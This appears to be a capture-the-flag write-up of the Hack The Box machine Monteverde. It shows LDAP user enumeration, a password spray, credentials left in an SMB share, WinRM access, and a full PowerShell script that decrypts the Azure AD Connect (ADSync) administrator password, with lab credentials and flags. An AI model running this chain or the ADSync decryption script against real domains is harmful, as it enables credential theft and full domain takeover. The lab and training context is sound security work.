Monteverde

Recon

nmap_scan.log

Open 10.129.228.111:53
Open 10.129.228.111:88
Open 10.129.228.111:135
Open 10.129.228.111:139
Open 10.129.228.111:389
Open 10.129.228.111:445
Open 10.129.228.111:464
Open 10.129.228.111:593
Open 10.129.228.111:3269
Open 10.129.228.111:3268
Open 10.129.228.111:5985
Open 10.129.228.111:9389
Open 10.129.228.111:49667
Open 10.129.228.111:49700
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.111

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-04 18:48:34Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T18:49:26
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59714/tcp): CLEAN (Timeout)
|   Check 2 (port 34394/tcp): CLEAN (Timeout)
|   Check 3 (port 29693/udp): CLEAN (Timeout)
|   Check 4 (port 62380/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

LDAP

We can login in SMB with NULL session, but no access to any resources or actions. We can enumerate LDAP:

└─$ netexec ldap 10.129.228.111 -u '' -p '' --users | tee ldap_users.txt
SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP                     10.129.228.111  389    MONTEVERDE       [+] MEGABANK.LOCAL\:
LDAP                     10.129.228.111  389    MONTEVERDE       [*] Total records returned: 270
...Too much garbage...
└─$ enum4linux-ng megabank.local | tee enum4linux.log
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... megabank.local
[*] Username ......... ''
[*] Random Username .. 'kapyieei'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =======================================
|    Listener Scan on megabank.local    |
 =======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ======================================================
|    Domain Information via LDAP for megabank.local    |
 ======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: MEGABANK.LOCAL

 ===========================================
|    SMB Dialect Check on megabank.local    |
 ===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 =============================================================
|    Domain Information via SMB session for megabank.local    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: MONTEVERDE
NetBIOS domain name: MEGABANK
DNS domain: MEGABANK.LOCAL
FQDN: MONTEVERDE.MEGABANK.LOCAL
Derived membership: domain member
Derived domain: MEGABANK

 ===========================================
|    RPC Session Check on megabank.local    |
 ===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 =====================================================
|    Domain Information via RPC for megabank.local    |
 =====================================================
[+] Domain: MEGABANK
[+] Domain SID: S-1-5-21-391775091-850290835-3566037492
[+] Membership: domain member

 =================================================
|    OS Information via RPC for megabank.local    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

 =======================================
|    Users via RPC on megabank.local    |
 =======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 10 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 10 user(s) via 'enumdomusers'
[+] After merging user results we have 10 user(s) total:
'1104':
  username: AAD_987d7f2f57d2
  name: AAD_987d7f2f57d2
  acb: '0x00000210'
  description: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
'1601':
  username: mhope
  name: Mike Hope
  acb: '0x00000210'
  description: (null)
'2602':
  username: SABatchJobs
  name: SABatchJobs
  acb: '0x00000210'
  description: (null)
'2603':
  username: svc-ata
  name: svc-ata
  acb: '0x00000210'
  description: (null)
'2604':
  username: svc-bexec
  name: svc-bexec
  acb: '0x00000210'
  description: (null)
'2605':
  username: svc-netapp
  name: svc-netapp
  acb: '0x00000210'
  description: (null)
'2613':
  username: dgalanos
  name: Dimitris Galanos
  acb: '0x00000210'
  description: (null)
'2614':
  username: roleary
  name: Ray O'Leary         '#
  acb: '0x00000210'
  description: (null)
'2615':
  username: smorgan
  name: Sally Morgan
  acb: '0x00000210'
  description: (null)
'501':
  username: Guest
  name: (null)
  acb: '0x00000215'
  description: Built-in account for guest access to the computer/domain


Completed after 23.82 seconds

Get valid usernames

└─$ grep username: enum4linux.log | awk '{print($2)}' > users.txt
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Guest

There's ADSync stuff and AAD_hex which probably is Connect Agent? Synchronizing the AD with AAD.

We could start bruteforcing password with rockyou or something, but first let's check if someone is using username as password

└─$ netexec smb 10.129.228.111 -u users.txt -p users.txt --no-bruteforce
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

SMB

└─$ netexec smb 10.129.228.111 -u SABatchJobs -p SABatchJobs --shares
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB         10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB         10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB         10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.129.228.111  445    MONTEVERDE       azure_uploads   READ
SMB         10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       users$          READ

└─$ netexec smb 10.129.228.111 -u SABatchJobs -p SABatchJobs -M spider_plus -o DOWNLOAD_FLAG=True
...
└─$ lta /tmp/nxc_spider_plus/10.129.228.111/
drwxrwxr-x    - woyag  4 Dec 14:30  /tmp/nxc_spider_plus/10.129.228.111
drwxrwxr-x    - woyag  4 Dec 14:30 ├──  SYSVOL
drwxrwxr-x    - woyag  4 Dec 14:30 │  └──  MEGABANK.LOCAL
drwxrwxr-x    - woyag  4 Dec 14:30 │     └──  Policies
drwxrwxr-x    - woyag  4 Dec 14:30 │        ├──  {6AC1786C-016F-11D2-945F-00C04fB984F9}
.rw-rw-r--   22 woyag  4 Dec 14:30 │        │  ├──  GPT.INI
drwxrwxr-x    - woyag  4 Dec 14:30 │        │  └──  MACHINE
drwxrwxr-x    - woyag  4 Dec 14:30 │        │     └──  Microsoft
drwxrwxr-x    - woyag  4 Dec 14:30 │        │        └──  'Windows NT'
drwxrwxr-x    - woyag  4 Dec 14:30 │        │           └──  SecEdit
.rw-rw-r-- 4.5k woyag  4 Dec 14:30 │        │              └──  GptTmpl.inf
drwxrwxr-x    - woyag  4 Dec 14:30 │        └──  {31B2F340-016D-11D2-945F-00C04FB984F9}
.rw-rw-r--   22 woyag  4 Dec 14:30 │           ├──  GPT.INI
drwxrwxr-x    - woyag  4 Dec 14:30 │           └──  MACHINE
drwxrwxr-x    - woyag  4 Dec 14:30 │              ├──  Microsoft
drwxrwxr-x    - woyag  4 Dec 14:30 │              │  └──  'Windows NT'
drwxrwxr-x    - woyag  4 Dec 14:30 │              │     └──  SecEdit
.rw-rw-r-- 1.1k woyag  4 Dec 14:30 │              │        └──  GptTmpl.inf
.rw-rw-r-- 2.8k woyag  4 Dec 14:30 │              └──  Registry.pol
drwxrwxr-x    - woyag  4 Dec 14:30 └──  users$
drwxrwxr-x    - woyag  4 Dec 14:30    └──  mhope
.rw-rw-r-- 1.2k woyag  4 Dec 14:30       └── 󰗀 azure.xml

└─$ cat /tmp/nxc_spider_plus/10.129.228.111/users\$/mhope/azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs> 

└─$ netexec smb 10.129.228.111 -u users.txt -p '4n0therD4y@n0th3r$'
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

WinRM

└─$ netexec winrm 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'
WINRM       10.129.228.111  5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM       10.129.228.111  5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

└─$ evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\mhope\Documents> cat ../Desktop/user.txt
147c15950dace62900b58a965cd5f39b

Privilege Escalation

We are part of Azure Admins -> Google: Azure Admins Connect Agent Priv Esc -> https://github.com/Cloud-Architekt/AzureAD-Attack-Defense/blob/main/AADCSyncServiceAccount.md

The approaches listed above need Python and second one needs whole Module to make it work, and that's too much!

Azure AD Connect for Red Teamers

It needs connection string and this account has access to server. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-enumeration

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q 'SELECT name FROM master..sysdatabases;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ADSync

(5 rows affected)
*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q "SELECT name FROM master..sysobjects WHERE xtype = 'U';"
name
--------------------------------------------------------------------------------------------------------------------------------
trace_xe_action_map
trace_xe_event_map
spt_fallback_db
spt_fallback_dev
spt_fallback_usg
spt_monitor

---

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q "USE ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
Changed database context to 'ADSync'.
private_configuration_xml                                                                                                                                                                                                                                        encrypted_configuration
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<adma-configuration>
 <forest-name>MEGABANK.LOCAL</forest-name>
 <forest-port>0</forest-port>
 <forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>
 <forest-login-user>administrator</forest-login-user>
 <forest-login-domain>MEGABANK.LOCAL 8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g

(1 rows affected)

---

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -L # List connection strings

Servers:
    ;UID:Login ID=?;PWD:Password=?;Trusted_Connection:Use Integrated Security=?;*APP:AppName=?;*WSID:WorkStation ID=?;

We can run the script in blog with Windows Authentication:

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=localhost;Initial Catalog=ADSync;Integrated Security=True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
---
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!

Root.txt

└─$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
e7ab35ef55a0b7c1e9bbd973e5757afd